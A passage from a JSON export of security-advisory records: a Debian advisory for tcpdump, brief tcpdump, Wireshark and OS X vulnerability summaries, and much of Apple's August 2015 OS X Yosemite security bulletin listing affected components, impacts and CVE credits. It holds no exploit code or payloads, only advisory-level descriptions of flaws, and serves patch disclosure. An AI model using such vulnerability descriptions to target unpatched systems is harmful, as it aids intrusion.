Bauch\r\nTwitter: @steffenbauch\r\nhttp://steffenbauch.de\r\n\r\nusing a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.\r\n", "modified": "2014-11-24T00:00:00", "published": "2014-11-24T00:00:00", "id": "SECURITYVULNS:DOC:31395", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31395", "title": "CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3086-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nDecember 03, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : tcpdump\r\nCVE ID : CVE-2014-8767 CVE-2014-8769 CVE-2014-9140\r\nDebian Bug : 770424 770434\r\n\r\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\r\nnetwork traffic analyzer. These vulnerabilities might result in denial\r\nof service, leaking sensitive information from memory or, potentially,\r\nexecution of arbitrary code.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 4.3.0-1+deb7u1.\r\n\r\nFor the upcoming stable distribution (jessie), these problems have been\r\nfixed in version 4.6.2-3.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 4.6.2-3.\r\n\r\nWe recommend that you upgrade your tcpdump packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJUf1yOAAoJEAVMuPMTQ89EnmsP/3WESLIPqyv0RVx0IPPRrvLP\r\nq1qri8ROuIMryu88ybOOCwo96OsnnO3lGeiJUzOUp6B+bgyJQKgQg6+oCq8MpJ3z\r\nYhKROPKNeW9j+fdtLqua6RPp2nFQNf4FemCOaIs1oM2aL4wye/iuXwXXF/i6eWve\r\nqQ2Ugjj/ahtxAPNRIte4XQK4q0OipopqZYNe3sdWP0jmQwYoFnpgrQHBlalx0GMm\r\nSTlykW8HhLVCyxlY16ENLyzCqjD8GT3osjhx6/k0997kkO/M0eEwKwvx44VhOmDl\r\np5m5tOPZJ+yUVQPNujDUJRLTsbMLSlZhzpWVJ9SOFyyY97zQ1y6lFFM3aXdXPOUV\r\nNJ51bXXexZb5OrTShsYFEM9GT9EOqLJl/PDbhrEb+1QETovDUR4JVK6VIy7yEZPO\r\nDEaFEH7t1GXE9jrX9U9tn9iIywndfz3vzvK1eTy9JMc/2qNz4/M+Ppvasu6Xmqg1\r\nJU3w+jiq1KleXaLHG2EKnlEuhM8rz3Eh6cTb8vwcXmJgwzcc8CW8KJWQghVfGO+d\r\n9wjxrToRWpieV66RhIdp4ZZ2K+S0U1AvNy+a8plKAfiiyLQC5eflZyNg5ckTDL4d\r\nHvgOSuqYEoY9F20mV++/IQVW0ML2gGpQmhmnm53qNJ460miqyfrc0rWItMRT4OU3\r\nIG5Q3GWMrw7bjLm2WGLD\r\n=71H0\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SECURITYVULNS:DOC:31477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31477", "title": "[SECURITY] [DSA 3086-1] tcpdump security update", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "DoS, code execution, information leakage.", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SECURITYVULNS:VULN:14136", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14136", "title": "tcpdump multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "Buffer overflow and DoS-conditions on different protocols parsing.", "modified": "2014-11-24T00:00:00", "published": "2014-11-24T00:00:00", "id": "SECURITYVULNS:VULN:14095", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14095", "title": "wireshark multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "description": "Over 150 different vulnerabilities in system components and libraries.", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett 